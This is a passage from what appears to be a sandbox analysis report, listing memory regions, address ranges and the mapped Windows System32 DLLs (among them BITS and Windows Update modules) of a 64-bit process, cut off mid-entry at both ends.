"\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 892 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 893 start_va = 0x7fefc700000 end_va = 0x7fefc7bafff entry_point = 0x7fefc700000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 894 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 895 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 896 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 897 start_va = 0x7fefc8f0000 end_va = 0x7fefc901fff entry_point = 0x7fefc8f0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 898 start_va = 0x7fefc910000 end_va = 0x7fefc92efff entry_point = 0x7fefc910000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 899 start_va = 0x7fefc9e0000 end_va = 0x7fefca18fff entry_point = 0x7fefc9e0000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 900 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 901 start_va = 0x7fefca30000 end_va = 0x7fefca3cfff entry_point = 0x7fefca30000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 902 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 903 start_va = 0x7fefcc10000 end_va = 0x7fefcc3ffff entry_point = 0x7fefcc10000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 904 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 905 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 906 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 907 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 908 start_va = 0x7fefcf30000 end_va = 0x7fefcf61fff entry_point = 0x7fefcf30000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 909 start_va = 0x7fefcf80000 end_va = 0x7fefcf89fff entry_point = 0x7fefcf80000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 910 start_va = 0x7fefd010000 end_va = 0x7fefd03efff entry_point = 0x7fefd010000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 911 start_va = 0x7fefd050000 end_va = 0x7fefd0bcfff entry_point = 0x7fefd050000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 912 start_va = 0x7fefd0c0000 end_va = 0x7fefd0d3fff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 913 start_va = 0x7fefd320000 end_va = 0x7fefd342fff entry_point = 0x7fefd320000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 914 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 915 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 916 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 917 start_va = 0x7fefd430000 end_va = 0x7fefd4c0fff entry_point = 0x7fefd430000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 918 start_va = 0x7fefd4d0000 end_va = 0x7fefd50cfff entry_point = 0x7fefd4d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 919 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 920 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 921 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 922 start_va = 0x7fefd680000 end_va = 0x7fefd6b9fff entry_point = 0x7fefd680000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 923 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 924 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 925 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 926 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 927 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 928 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 929 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 930 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 931 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 932 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 933 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 934 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 935 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 936 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 937 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 938 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 939 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 940 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 941 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 942 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 943 start_va = 0x7feff650000 end_va = 0x7feff826fff entry_point = 0x7feff650000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 944 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 945 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 946 start_va = 0x7fffff5a000 end_va = 0x7fffff5bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5a000" filename = "" Region: id = 947 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 948 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 949 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 950 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 951 start_va = 0x7fffff64000 end_va = 0x7fffff65fff entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 952 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 953 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 954 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 955 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 956 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 957 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 958 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 959 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 960 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 961 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 962 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 963 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 964 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 965 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 966 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 967 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 968 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 969 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 970 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 971 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 972 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 973 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 974 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 975 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 976 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 977 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 978 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 979 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 980 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 981 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 982 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 983 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 984 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 985 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 986 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 987 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 988 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 989 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 990 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 991 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 992 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 993 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1023 start_va = 0x3040000 end_va = 0x30bffff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 1024 start_va = 0x7feddf30000 end_va = 0x7feddf39fff entry_point = 0x7feddf30000 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1025 start_va = 0x7feddf40000 end_va = 0x7fede011fff entry_point = 0x7feddf40000 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1026 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 1027 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1028 start_va = 0x38b0000 end_va = 0x392ffff entry_point = 0x0 region_type = private name = "private_0x00000000038b0000" filename = "" Region: id = 1029 start_va = 0x7feddf10000 end_va = 0x7feddf21fff entry_point = 0x7feddf10000 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1030 start_va = 0x32e0000 end_va = 0x335ffff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 1031 start_va = 0x7feddec0000 end_va = 0x7feddf04fff entry_point = 0x7feddec0000 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1032 start_va = 0x7fef6180000 end_va = 0x7fef6190fff entry_point = 0x7fef6180000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1033 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1034 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1035 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 1053 start_va = 0x2a90000 end_va = 0x2b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 1054 start_va = 0x2bc0000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 1055 start_va = 0x3260000 end_va = 0x32dffff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 1056 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1057 start_va = 0x3b50000 end_va = 0x3bcffff entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 1058 start_va = 0x3bd0000 end_va = 0x3c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 1059 start_va = 0x3ee0000 end_va = 0x3f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 1060 start_va = 0x40f0000 end_va = 0x416ffff entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 1061 start_va = 0x4940000 end_va = 0x49bffff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 1062 start_va = 0x7fedd840000 end_va = 0x7fedda92fff entry_point = 0x7fedd840000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1063 start_va = 0x7fedddc0000 end_va = 0x7fedddcefff entry_point = 0x7fedddc0000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 1064 start_va = 0x7fedfa00000 end_va = 0x7fedfc79fff entry_point = 0x7fedfa00000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1065 start_va = 0x7fef4de0000 end_va = 0x7fef4e50fff entry_point = 0x7fef4de0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1066 start_va = 0x7fef86c0000 end_va = 0x7fef86dafff entry_point = 0x7fef86c0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1067 start_va = 0x7fffff58000 end_va = 0x7fffff59fff entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1068 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1069 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1070 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 1071 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1072 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 1073 start_va = 0x7fffff80000 end_va = 0x7fffff81fff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1074 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1075 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1076 start_va = 0x49c0000 end_va = 0x4abffff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 1077 start_va = 0x4bf0000 end_va = 0x4bfffff entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" Region: id = 1078 start_va = 0x777a0000 end_va = 0x777a6fff entry_point = 0x777a0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 1079 start_va = 0x7fefcf70000 end_va = 0x7fefcf77fff entry_point = 0x7fefcf70000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1080 start_va = 0x7fedddb0000 end_va = 0x7fedddbcfff entry_point = 0x7fedddb0000 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1817 start_va = 0x1350000 end_va = 0x1350fff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 1818 start_va = 0x13e0000 end_va = 0x13e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013e0000" filename = "" Region: id = 1819 start_va = 0x1470000 end_va = 0x1477fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 1820 start_va = 0x1490000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001490000" filename = "" Region: id = 1821 start_va = 0x1520000 end_va = 0x1539fff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 1822 start_va = 0x15c0000 end_va = 0x15cffff entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 1823 start_va = 0x15d0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 1824 start_va = 0x15e0000 end_va = 0x15e0fff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 1825 start_va = 0x1670000 end_va = 0x1671fff entry_point = 0x0 region_type = private name = "private_0x0000000001670000" filename = "" Region: id = 1826 start_va = 0x1700000 end_va = 0x1700fff entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 1827 start_va = 0x1710000 end_va = 0x171ffff entry_point = 0x0 region_type = private name = "private_0x0000000001710000" filename = "" Region: id = 1828 start_va = 0x1720000 end_va = 0x1727fff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 1829 start_va = 0x1730000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 1830 start_va = 0x1740000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 1831 start_va = 0x17d0000 end_va = 0x17d7fff entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 1832 start_va = 0x17e0000 end_va = 0x17effff entry_point = 0x17e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1833 start_va = 0x17f0000 end_va = 0x17fffff entry_point = 0x17f0000 region_type = mapped_file name = "datastore.edb" filename = 